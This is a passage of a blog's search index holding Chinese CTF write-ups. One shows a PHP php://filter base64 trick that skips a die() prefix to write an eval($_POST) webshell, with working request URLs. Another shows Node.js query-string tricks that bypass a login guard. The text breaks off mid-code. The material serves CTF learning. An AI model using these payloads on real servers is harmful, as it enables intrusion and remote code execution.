-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathsearch.xml
2126 lines (1628 loc) · 602 KB
/
search.xml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
951
952
953
954
955
956
957
958
959
960
961
962
963
964
965
966
967
968
969
970
971
972
973
974
975
976
977
978
979
980
981
982
983
984
985
986
987
988
989
990
991
992
993
994
995
996
997
998
999
1000
<?xml version="1.0" encoding="utf-8"?>
<search>
<entry>
<title>记又又又一次拉练-php审计</title>
<url>/2021/10/11/%E8%AE%B0%E5%8F%88%E5%8F%88%E5%8F%88%E4%B8%80%E6%AC%A1%E6%8B%89%E7%BB%83/</url>
<content><![CDATA[<p>本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。</p>
<div style="text-align: right"> 小维</div>
<h4 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h4><p>这篇文章记述了又又又一次的CTF拉练,一道php审计题~</p>
<h4 id="源码"><a href="#源码" class="headerlink" title="源码"></a>源码</h4><figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="comment"># upload www-data rwx</span></span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>($_GET[<span class="string">'path'</span>]) && <span class="keyword">isset</span>($_GET[<span class="string">'data'</span>])) {</span><br><span class="line"> $data = <span class="string">"<?php\ndie('no php');\n?>\n"</span>;</span><br><span class="line"> $content = $data.base64_decode($_GET[<span class="string">'data'</span>]);</span><br><span class="line"> file_put_contents($_GET[<span class="string">'path'</span>], $content);</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">'OK'</span>;</span><br><span class="line">} <span class="keyword">else</span>{</span><br><span class="line"> highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">}</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure>
<a id="more"></a>
<h4 id="思路解析"><a href="#思路解析" class="headerlink" title="思路解析"></a>思路解析</h4><p>首先分析代码, 注释提示上传路径upload,判断GET请求是否有path、data参数,file_put_contents写入文件名(filename)为path参数的值,内容(content)为<code><?php\ndie('no php');\n?>\n</code>拼接base64_decode(data参数的值)。</p>
<h4 id="初步想法"><a href="#初步想法" class="headerlink" title="初步想法"></a>初步想法</h4><p>想要GetShell的话,就必须把<code>die('no php')</code>给干掉。</p>
<h4 id="本题考点"><a href="#本题考点" class="headerlink" title="本题考点"></a>本题考点</h4><p>die() 函数输出一条消息,并退出当前脚本。该函数是 exit() 函数的别名。</p>
<p>php://filter 绕过die()函数 => 可参考phith0n之前的文章里有很详细的介绍<a href="https://www.leavesongs.com/PENETRATION/php-filter-magic.html" target="_blank" rel="noopener">传送门</a></p>
<h4 id="解题步骤"><a href="#解题步骤" class="headerlink" title="解题步骤"></a>解题步骤</h4><h5 id="解法一"><a href="#解法一" class="headerlink" title="解法一"></a>解法一</h5><p>尝试写入<code><?php phpinfo();?></code>文件</p>
<figure class="highlight awk"><table><tr><td class="code"><pre><span class="line">http:<span class="regexp">//</span>ctf.xxx.com?path=php:<span class="regexp">//</span>filter<span class="regexp">/write=convert.base64-decode/</span>resource=upload<span class="regexp">/test.php&data=YVBEOXdhSEFnY0dod2FXNW1ieWdwT3o4Kw==</span></span><br></pre></td></tr></table></figure>
<p>PD9waHAgcGhwaW5mbygpOz8+前面加一个”a”,是因为在解码的过程中,字符<、?、;、>、空格等一共有7个字符不符合base64编码的字符范围将被忽略,所以最终被解码的字符仅有“phpdienophp”和我们传入的其他字符。</p>
<p>“phpdienophp”一共11个字符,因为base64算法解码时是4个byte一组,所以给他增加1个”a”,一共12个字符。这样,”phpdienophp”被正常解码,而后面我们传入的webshell的base64内容也被正常解码。</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="meta"><?php</span> phpinfo();<span class="meta">?></span> => PD9waHAgcGhwaW5mbygpOz8+ => aPD9waHAgcGhwaW5mbygpOz8+ => YVBEOXdhSEFnY0dod2FXNW1ieWdwT3o4Kw==</span><br></pre></td></tr></table></figure>
<p><img src="/img/%E8%AE%B0%E5%8F%88%E5%8F%88%E5%8F%88%E4%B8%80%E6%AC%A1%E6%8B%89%E7%BB%83/image-20211011132326071.png" alt="image-20211011132326071"></p>
<p><img src="/img/%E8%AE%B0%E5%8F%88%E5%8F%88%E5%8F%88%E4%B8%80%E6%AC%A1%E6%8B%89%E7%BB%83/image-20211011142654572.png" alt="image-20211011142654572"></p>
<p><img src="/img/%E8%AE%B0%E5%8F%88%E5%8F%88%E5%8F%88%E4%B8%80%E6%AC%A1%E6%8B%89%E7%BB%83/image-20211011142751873.png" alt="image-20211011142751873"></p>
<p>写入一句话<code><?php eval($_POST[1]);?></code>文件</p>
<figure class="highlight vim"><table><tr><td class="code"><pre><span class="line">http://ctf.xxx.<span class="keyword">com</span>?path=php://<span class="built_in">filter</span>/<span class="keyword">write</span>=convert.base64-decode/resource=upload/<span class="keyword">shell</span>.php&data=YVBEOXdhSEFnWlhaaGJDZ2tYMUJQVTFSYk1WMHBPejgr</span><br></pre></td></tr></table></figure>
<p><img src="/img/%E8%AE%B0%E5%8F%88%E5%8F%88%E5%8F%88%E4%B8%80%E6%AC%A1%E6%8B%89%E7%BB%83/image-20211011132825365.png" alt="image-20211011132825365"></p>
<p>蚁剑连接,翻看flag。</p>
<p><img src="/img/%E8%AE%B0%E5%8F%88%E5%8F%88%E5%8F%88%E4%B8%80%E6%AC%A1%E6%8B%89%E7%BB%83/image-20211011143035632.png" alt="image-20211011143035632"></p>
<h5 id="解法二"><a href="#解法二" class="headerlink" title="解法二"></a>解法二</h5><figure class="highlight awk"><table><tr><td class="code"><pre><span class="line">http:<span class="regexp">//</span>ctf.xxx.com<span class="regexp">/?path=php:/</span><span class="regexp">/filter/</span>write=string.strip_tags|convert.base64-decode<span class="regexp">/resource=upload/</span>test1245.php&data=UEQ5d2FIQWdjR2h3YVc1bWJ5Z3BPeUEvUGc9PQ==</span><br></pre></td></tr></table></figure>
<p><img src="/img/%E8%AE%B0%E5%8F%88%E5%8F%88%E5%8F%88%E4%B8%80%E6%AC%A1%E6%8B%89%E7%BB%83/image-20211011142123931.png" alt="image-20211011142123931"></p>
<p><img src="/img/%E8%AE%B0%E5%8F%88%E5%8F%88%E5%8F%88%E4%B8%80%E6%AC%A1%E6%8B%89%E7%BB%83/image-20211011141958762.png" alt="image-20211011141958762"></p>
<p><img src="/img/%E8%AE%B0%E5%8F%88%E5%8F%88%E5%8F%88%E4%B8%80%E6%AC%A1%E6%8B%89%E7%BB%83/image-20211011170414108.png" alt="image-20211011170414108"></p>
<h4 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h4><p><a href="https://www.leavesongs.com/PENETRATION/php-filter-magic.html" target="_blank" rel="noopener">https://www.leavesongs.com/PENETRATION/php-filter-magic.html</a></p>
<p><a href="https://cyc1e183.github.io/2020/04/03/%E5%85%B3%E4%BA%8Efile_put_contents%E7%9A%84%E4%B8%80%E4%BA%9B%E5%B0%8F%E6%B5%8B%E8%AF%95/" target="_blank" rel="noopener">https://cyc1e183.github.io/2020/04/03/%E5%85%B3%E4%BA%8Efile_put_contents%E7%9A%84%E4%B8%80%E4%BA%9B%E5%B0%8F%E6%B5%8B%E8%AF%95/</a></p>
]]></content>
</entry>
<entry>
<title>记又又一次拉练-Node.js</title>
<url>/2021/07/04/%E8%AE%B0%E5%8F%88%E5%8F%88%E4%B8%80%E6%AC%A1%E6%8B%89%E7%BB%83/</url>
<content><![CDATA[<p>本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。</p>
<div style="text-align: right"> 小维</div>
<h4 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h4><p>这篇文章记述了又又一次的CTF拉练,node.js的白盒审计题,跟上次的<a href="https://www.nday.top/2021/06/26/%E8%AE%B0%E5%8F%88%E4%B8%80%E6%AC%A1CTF%E6%8B%89%E7%BB%83-node/" target="_blank" rel="noopener">记又一次CTF拉练-Node.js</a>基本逻辑一样,感觉是得到了很多非预期解进一步限制条件~</p>
<h4 id="sourceCode1源码"><a href="#sourceCode1源码" class="headerlink" title="sourceCode1源码"></a>sourceCode1源码</h4><figure class="highlight javascript"><table><tr><td class="code"><pre><span class="line">process.on(<span class="string">'uncaughtException'</span>, <span class="function"><span class="keyword">function</span> (<span class="params">err</span>) </span>{</span><br><span class="line"> <span class="built_in">console</span>.log(<span class="string">'Caught exception: '</span>, err);</span><br><span class="line">});</span><br><span class="line"></span><br><span class="line"><span class="keyword">var</span> express = <span class="built_in">require</span>(<span class="string">'express'</span>)</span><br><span class="line"><span class="keyword">var</span> session = <span class="built_in">require</span>(<span class="string">'express-session'</span>);</span><br><span class="line"><span class="keyword">var</span> fs = <span class="built_in">require</span>(<span class="string">'fs'</span>);</span><br><span class="line"><span class="keyword">var</span> path = <span class="built_in">require</span>(<span class="string">'path'</span>);</span><br><span class="line"><span class="keyword">var</span> config = <span class="built_in">require</span>(<span class="string">'./config'</span>);</span><br><span class="line"><span class="keyword">var</span> marked = <span class="built_in">require</span>(<span class="string">'marked'</span>);</span><br><span class="line"><span class="keyword">var</span> morgan = <span class="built_in">require</span>(<span class="string">'morgan'</span>);</span><br><span class="line"><span class="keyword">var</span> bodyParser = <span class="built_in">require</span>(<span class="string">'body-parser'</span>);</span><br><span class="line"><span class="keyword">var</span> AccessControl = <span class="built_in">require</span>(<span class="string">'express-ip-access-control'</span>);</span><br><span class="line"><span class="keyword">var</span> getflag2 = <span class="built_in">require</span>(<span class="string">'./getflag2'</span>);</span><br><span class="line"><span class="keyword">var</span> getflag3 = <span class="built_in">require</span>(<span class="string">'./getflag3'</span>);</span><br><span class="line"></span><br><span class="line"><span class="keyword">var</span> port = process.env.PORT;</span><br><span class="line"><span class="keyword">var</span> app = express()</span><br><span class="line"><span class="keyword">var</span> sourceCode;</span><br><span class="line"></span><br><span class="line">marked.setOptions({</span><br><span class="line"> highlight: <span class="function"><span class="keyword">function</span> (<span class="params">code</span>) </span>{</span><br><span class="line"> <span class="keyword">return</span> <span class="built_in">require</span>(<span class="string">'highlight.js'</span>).highlightAuto(code).value</span><br><span class="line"> }</span><br><span class="line">})</span><br><span class="line"></span><br><span class="line">fs.readFile(<span class="string">'app.js'</span>, <span class="string">'utf8'</span>, (err, data) => {</span><br><span class="line"> <span class="keyword">if</span> (!err) {</span><br><span class="line"> markdown = <span class="string">`\`\`\`node\n<span class="subst">${data}</span>\n\`\`\``</span>;</span><br><span class="line"> sourceCode = marked(markdown);</span><br><span class="line"> }</span><br><span class="line">});</span><br><span class="line"></span><br><span class="line">fs.readFile(<span class="string">'package.json'</span>, <span class="string">'utf8'</span>, (err, data) => {</span><br><span class="line"> <span class="keyword">if</span> (!err) {</span><br><span class="line"> markdown = <span class="string">`\`\`\`json\n<span class="subst">${data}</span>\n\`\`\``</span>;</span><br><span class="line"> packageData = marked(markdown);</span><br><span class="line"> }</span><br><span class="line">});</span><br><span class="line"></span><br><span class="line"><span class="keyword">var</span> options = {</span><br><span class="line"> mode: <span class="string">'allow'</span>,</span><br><span class="line"> denys: [],</span><br><span class="line"> allows: [<span class="string">'10.0.0.6'</span>],</span><br><span class="line"> forceConnectionAddress: <span class="literal">false</span>,</span><br><span class="line"> log: <span class="function"><span class="keyword">function</span> (<span class="params">clientIp, access</span>) </span>{</span><br><span class="line"> <span class="keyword">if</span> (!access)</span><br><span class="line"> <span class="built_in">console</span>.log(<span class="string">`<span class="subst">${clientIp}</span> denied.`</span>);</span><br><span class="line"> },</span><br><span class="line"> statusCode: <span class="number">404</span>,</span><br><span class="line"> redirectTo: <span class="string">''</span>,</span><br><span class="line"> message: <span class="string">'404 Not Found...Don\'t fuck me Please......'</span></span><br><span class="line">};</span><br><span class="line"></span><br><span class="line">app.use(AccessControl(options));</span><br><span class="line">app.set(<span class="string">'views'</span>, path.join(__dirname, <span class="string">'views'</span>));</span><br><span class="line">app.set(<span class="string">'view engine'</span>, <span class="string">'ejs'</span>);</span><br><span class="line">app.use(express.static(path.join(__dirname, <span class="string">'public'</span>)));</span><br><span class="line">app.use(session({ <span class="attr">secret</span>: <span class="string">'xxx'</span>, <span class="attr">resave</span>: <span class="literal">true</span>, <span class="attr">saveUninitialized</span>: <span class="literal">true</span>, <span class="attr">name</span>: <span class="string">'SID'</span> }));</span><br><span class="line">morgan.format(<span class="string">'ctf'</span>, <span class="string">'[ctf] [:remote-addr/:req[x-forwarded-for]] - ":method :url HTTP/:http-version" :status :res[content-length] ":referrer" ":user-agent"'</span>);</span><br><span class="line">app.use(morgan(<span class="string">'ctf'</span>));</span><br><span class="line">app.use(bodyParser.urlencoded({ <span class="attr">limit</span>: <span class="string">'100mb'</span>, <span class="attr">extended</span>: <span class="literal">true</span>, <span class="attr">parameterLimit</span>: <span class="number">1000000</span> }));</span><br><span class="line"></span><br><span class="line">app.get(<span class="string">'/'</span>, <span class="function"><span class="keyword">function</span>(<span class="params">req, res</span>) </span>{</span><br><span class="line"> <span class="comment">// console.log(sourceCode);</span></span><br><span class="line"> res.render(<span class="string">'index'</span>, {<span class="attr">code</span>: sourceCode});</span><br><span class="line">});</span><br><span class="line"><span class="comment">// 模块信息</span></span><br><span class="line">app.get(<span class="string">'/package.json'</span>, <span class="function"><span class="keyword">function</span> (<span class="params">req, res</span>) </span>{</span><br><span class="line"> res.render(<span class="string">'index'</span>, { <span class="attr">code</span>: packageData });</span><br><span class="line">});</span><br><span class="line"><span class="comment">// 版本信息页面</span></span><br><span class="line">app.get(<span class="string">'/version'</span>, <span class="function"><span class="keyword">function</span> (<span class="params">req, res</span>) </span>{</span><br><span class="line"> data = <span class="string">'Node version is: '</span> + process.version;</span><br><span class="line"> res.render(<span class="string">'index'</span>, { <span class="attr">code</span>: data });</span><br><span class="line">});</span><br><span class="line"></span><br><span class="line">app.use(<span class="function"><span class="keyword">function</span> (<span class="params">req, res, next</span>) </span>{</span><br><span class="line"> <span class="keyword">if</span> (isProtectUrl(req.originalUrl, req.query) && (<span class="keyword">typeof</span> req.session[<span class="string">'username'</span>] == <span class="string">'undefined'</span>)) {</span><br><span class="line"> res.redirect(<span class="string">'/'</span>);</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> next();</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="function"><span class="keyword">function</span> <span class="title">isProtectUrl</span>(<span class="params">url, query_url</span>) </span>{</span><br><span class="line"> <span class="keyword">var</span> isProtectUrl = <span class="literal">true</span>;</span><br><span class="line"><span class="comment">// 新增匹配有 ]* 需等于]= 或 ][</span></span><br><span class="line"> <span class="keyword">var</span> ch = <span class="regexp">/\]./g</span></span><br><span class="line"> <span class="keyword">var</span> seg = <span class="literal">null</span>;</span><br><span class="line"> <span class="keyword">var</span> unProtectUrl = [];</span><br><span class="line"> unProtectUrl.push(<span class="string">'/login'</span>);</span><br><span class="line"></span><br><span class="line"> <span class="keyword">while</span> ((seg = ch.exec(url)) != <span class="literal">null</span>) {</span><br><span class="line"> <span class="keyword">if</span> (seg[<span class="number">0</span>] != <span class="string">']='</span> && seg[<span class="number">0</span>] != <span class="string">']['</span>)</span><br><span class="line"> <span class="keyword">return</span> isProtectUrl</span><br><span class="line"> }</span><br><span class="line"><span class="comment">//新增了对__proto__限制</span></span><br><span class="line"> <span class="keyword">for</span> (<span class="keyword">var</span> i = <span class="number">0</span>; i < unProtectUrl.length; i++) {</span><br><span class="line"> <span class="keyword">if</span> (unProtectUrl[i] == url || (url.indexOf(<span class="string">'__proto__'</span>) < <span class="number">0</span> && url.indexOf(<span class="string">'#'</span>) < <span class="number">0</span> && url.indexOf(unProtectUrl[i]) >= <span class="number">0</span> && <span class="built_in">JSON</span>.stringify(query_url).indexOf(unProtectUrl[i]) < <span class="number">0</span>)) {</span><br><span class="line"> isProtectUrl = <span class="literal">false</span>;</span><br><span class="line"> <span class="keyword">break</span>;</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">return</span> isProtectUrl</span><br><span class="line"> }</span><br><span class="line">});</span><br><span class="line"></span><br><span class="line">app.get(<span class="string">'/login'</span>, <span class="function"><span class="keyword">function</span>(<span class="params">req, res</span>) </span>{</span><br><span class="line"> res.render(<span class="string">'login'</span>);</span><br><span class="line">});</span><br><span class="line"></span><br><span class="line">app.post(<span class="string">'/login'</span>, <span class="function"><span class="keyword">function</span> (<span class="params">req, res</span>) </span>{</span><br><span class="line"> <span class="keyword">var</span> username = req.body[<span class="string">'username'</span>];</span><br><span class="line"> <span class="keyword">var</span> password = req.body[<span class="string">'password'</span>];</span><br><span class="line"> <span class="keyword">if</span> (username == config.username && password == config.password) {</span><br><span class="line"> req.session[<span class="string">"username"</span>] = <span class="string">"admin"</span>;</span><br><span class="line"> res.send(<span class="string">"login success."</span>);</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> res.send(<span class="string">'login failed.'</span>);</span><br><span class="line"> } </span><br><span class="line">});</span><br><span class="line"><span class="comment">// 新增了getflag1,getflag2,getflag3 将flag分开放在3个页面</span></span><br><span class="line">app.get(<span class="string">'/getflag1'</span>, <span class="function"><span class="keyword">function</span> (<span class="params">req, res</span>) </span>{</span><br><span class="line"> fs.readFile(<span class="string">'getflag2.js'</span>, <span class="string">'utf8'</span>, (err, data) => {</span><br><span class="line"> <span class="keyword">if</span> (!err) {</span><br><span class="line"> markdown = <span class="string">`\`\`\`node\n<span class="subst">${data}</span>\n\`\`\``</span>;</span><br><span class="line"> sourceCode2 = marked(markdown);</span><br><span class="line"> }</span><br><span class="line"> });</span><br><span class="line"> res.render(<span class="string">'flag'</span>, { <span class="attr">flag</span>: config.flag1, <span class="attr">code</span>: sourceCode2});</span><br><span class="line">});</span><br><span class="line"></span><br><span class="line">app.get(<span class="string">'/getflag2'</span>, getflag2);</span><br><span class="line">app.get(<span class="string">'/getflag3'</span>, getflag3);</span><br><span class="line"></span><br><span class="line">app.listen(port, <span class="string">'0.0.0.0'</span>, () => {</span><br><span class="line"> <span class="built_in">console</span>.log(<span class="string">`ctf app listening at http://0.0.0.0:<span class="subst">${port}</span>`</span>);</span><br><span class="line">})</span><br></pre></td></tr></table></figure>
<a id="more"></a>
<h4 id="思路解析"><a href="#思路解析" class="headerlink" title="思路解析"></a>思路解析</h4><p>首先分析代码, 先是引入一些模块,定义网站根路径加载源码,定义了package.json,Version页面提供一些版本信息,中间用isProtectUrl进行判断url中是否有相关字符等及session[‘username’]是否定义来处理请求,不包含相关字符或者未定义seesion[‘username’]则 跳转到网站根路径;定义了一个login页面,可以post验证用户名及密码,如果用户密码对了则session 赋值;定义了一个getflag1,getflag2,getflag3页面,3个页面加载flag显示。 题目主要请求访问/getflag1,/getflag2,/getflag3来查看flag文件。基本逻辑跟上次的<a href="https://www.nday.top/2021/06/26/%E8%AE%B0%E5%8F%88%E4%B8%80%E6%AC%A1CTF%E6%8B%89%E7%BB%83-node/" target="_blank" rel="noopener">记又一次CTF拉练-Node.js</a>一致~~,感觉是上一次得到很多非预期解(猜的…),进一步限制了条件,上一次的升级版。</p>
<h4 id="初步想法"><a href="#初步想法" class="headerlink" title="初步想法"></a>初步想法</h4><p>绕过isProtectUrl(req.originalUrl, req.query)</p>
<h4 id="本题考点"><a href="#本题考点" class="headerlink" title="本题考点"></a>本题考点</h4><p>req.query 包含在路由中每个查询字符串参数属性的对象。如果没有,默认为{}; </p>
<p>1、不能获取原型链的属性 </p>
<p>2、如果没有query string,它就是一个空对象,属性的值为{}。</p>
<p>3、不能获取数组[]后面=前面的值(如:<code>[]123</code>不能获取到123)</p>
<p>…</p>
<h4 id="解题步骤"><a href="#解题步骤" class="headerlink" title="解题步骤"></a>解题步骤</h4><p>getflag1对url中存在<code>__proto__</code>及存在<code>]*</code>进行了判断,根据相关特性我们可以构造<code>getflag1?=/login</code> <code>getflag1?1=1&=/login</code> <code>getflag1?&%5b%5d/login</code> <code>getflag1?[][/login</code>等进行绕过</p>
<figure class="highlight groovy"><table><tr><td class="code"><pre><span class="line"><span class="string">https:</span><span class="comment">//xxx.xxx.xxx.com/getflag1?=/login</span></span><br><span class="line">得到第一部分<span class="string">flag:</span> Your flag <span class="string">is:</span> flag{Yeah 和 sourceCode2</span><br></pre></td></tr></table></figure>
<p><img src="/img/%E8%AE%B0%E5%8F%88%E5%8F%88%E4%B8%80%E6%AC%A1%E6%8B%89%E7%BB%83/image-20210704134027011.png" alt="image-20210704134027011"></p>
<h5 id="sourceCode2源码"><a href="#sourceCode2源码" class="headerlink" title="sourceCode2源码"></a>sourceCode2源码</h5><figure class="highlight javascript"><table><tr><td class="code"><pre><span class="line"><span class="keyword">var</span> fs = <span class="built_in">require</span>(<span class="string">'fs'</span>);</span><br><span class="line"><span class="keyword">var</span> config = <span class="built_in">require</span>(<span class="string">'./config'</span>);</span><br><span class="line"><span class="keyword">var</span> marked = <span class="built_in">require</span>(<span class="string">'marked'</span>);</span><br><span class="line"></span><br><span class="line">marked.setOptions({</span><br><span class="line"> highlight: <span class="function"><span class="keyword">function</span> (<span class="params">code</span>) </span>{</span><br><span class="line"> <span class="keyword">return</span> <span class="built_in">require</span>(<span class="string">'highlight.js'</span>).highlightAuto(code).value</span><br><span class="line"> }</span><br><span class="line">})</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">isProtectUrl</span>(<span class="params">url, query_url</span>) </span>{</span><br><span class="line"> <span class="keyword">var</span> isProtectUrl = <span class="literal">true</span>;</span><br><span class="line"> <span class="keyword">var</span> ch = <span class="regexp">/\]./g</span></span><br><span class="line"> <span class="keyword">var</span> seg = <span class="literal">null</span>;</span><br><span class="line"> <span class="keyword">var</span> unProtectUrl = [];</span><br><span class="line"> unProtectUrl.push(<span class="string">'/login'</span>);</span><br><span class="line"><span class="comment">// 匹配如果有]* 需等于]= </span></span><br><span class="line"> <span class="keyword">while</span> ((seg = ch.exec(url)) != <span class="literal">null</span>) {</span><br><span class="line"> <span class="keyword">if</span> (seg[<span class="number">0</span>] != <span class="string">']='</span>)</span><br><span class="line"> <span class="keyword">return</span> isProtectUrl</span><br><span class="line"> }</span><br><span class="line"> <span class="comment">// 新增对__proto__限制</span></span><br><span class="line"> <span class="keyword">for</span> (<span class="keyword">var</span> i = <span class="number">0</span>; i < unProtectUrl.length; i++) {</span><br><span class="line"> <span class="keyword">if</span> (unProtectUrl[i] == url || (url.indexOf(<span class="string">'__proto__'</span>) < <span class="number">0</span> && url.indexOf(<span class="string">'#'</span>) < <span class="number">0</span> && url.indexOf(unProtectUrl[i]) >= <span class="number">0</span> && <span class="built_in">JSON</span>.stringify(query_url).indexOf(unProtectUrl[i]) < <span class="number">0</span>)) {</span><br><span class="line"> isProtectUrl = <span class="literal">false</span>;</span><br><span class="line"> <span class="keyword">break</span>;</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">return</span> isProtectUrl</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">getflag2</span>(<span class="params">req, res</span>) </span>{</span><br><span class="line"> <span class="keyword">if</span> (isProtectUrl(req.originalUrl, req.query)) {</span><br><span class="line"> res.redirect(<span class="string">'/'</span>);</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> fs.readFile(<span class="string">'getflag3.js'</span>, <span class="string">'utf8'</span>, (err, data) => {</span><br><span class="line"> <span class="keyword">if</span> (!err) {</span><br><span class="line"> markdown = <span class="string">`\`\`\`node\n<span class="subst">${data}</span>\n\`\`\``</span>;</span><br><span class="line"> sourceCode3 = marked(markdown);</span><br><span class="line"> }</span><br><span class="line"> });</span><br><span class="line"> res.render(<span class="string">'flag'</span>, { <span class="attr">flag</span>: config.flag2, <span class="attr">code</span>: sourceCode3});</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="built_in">module</span>.exports = getflag2;</span><br></pre></td></tr></table></figure>
<p>getflag2也对url中存在<code>__proto__</code>及存在<code>]*</code> 看是否等于<code>]=</code>的判断,根据特性我们可以构造<code>getflag1?=/login</code> <code>getflag1?1=1&=/login</code> <code>getflag1?&%5b%5d/login</code>等进行绕过</p>
<figure class="highlight groovy"><table><tr><td class="code"><pre><span class="line"><span class="string">https:</span><span class="comment">//xxx.xxx.xxx.xxx.com/getflag2?=/login</span></span><br><span class="line">得到第二部分<span class="string">flag:</span> Your flag <span class="string">is:</span> _Yeah_Yeah_You 和 sourceCode3</span><br></pre></td></tr></table></figure>
<p><img src="/img/%E8%AE%B0%E5%8F%88%E5%8F%88%E4%B8%80%E6%AC%A1%E6%8B%89%E7%BB%83/image-20210704134108570.png" alt="image-20210704134108570"></p>
<h5 id="sourceCode3源码"><a href="#sourceCode3源码" class="headerlink" title="sourceCode3源码"></a>sourceCode3源码</h5><figure class="highlight javascript"><table><tr><td class="code"><pre><span class="line"><span class="keyword">var</span> config = <span class="built_in">require</span>(<span class="string">'./config'</span>);</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">isProtectUrl</span>(<span class="params">url, query_url</span>) </span>{</span><br><span class="line"> <span class="keyword">var</span> isProtectUrl = <span class="literal">true</span>;</span><br><span class="line"> <span class="keyword">var</span> ch = <span class="regexp">/\]./g</span></span><br><span class="line"> <span class="keyword">var</span> seg = <span class="literal">null</span>;</span><br><span class="line"> <span class="keyword">var</span> unProtectUrl = [];</span><br><span class="line"> unProtectUrl.push(<span class="string">'/login'</span>);</span><br><span class="line"><span class="comment">// 匹配有]* 需等于]=</span></span><br><span class="line"> <span class="keyword">while</span> ((seg = ch.exec(url)) != <span class="literal">null</span>) {</span><br><span class="line"> <span class="keyword">if</span> (seg[<span class="number">0</span>] != <span class="string">']='</span>)</span><br><span class="line"> <span class="keyword">return</span> isProtectUrl</span><br><span class="line"> }</span><br><span class="line"> <span class="comment">// 新增了对__proto__,?=,&=等限制</span></span><br><span class="line"> <span class="keyword">for</span> (<span class="keyword">var</span> i = <span 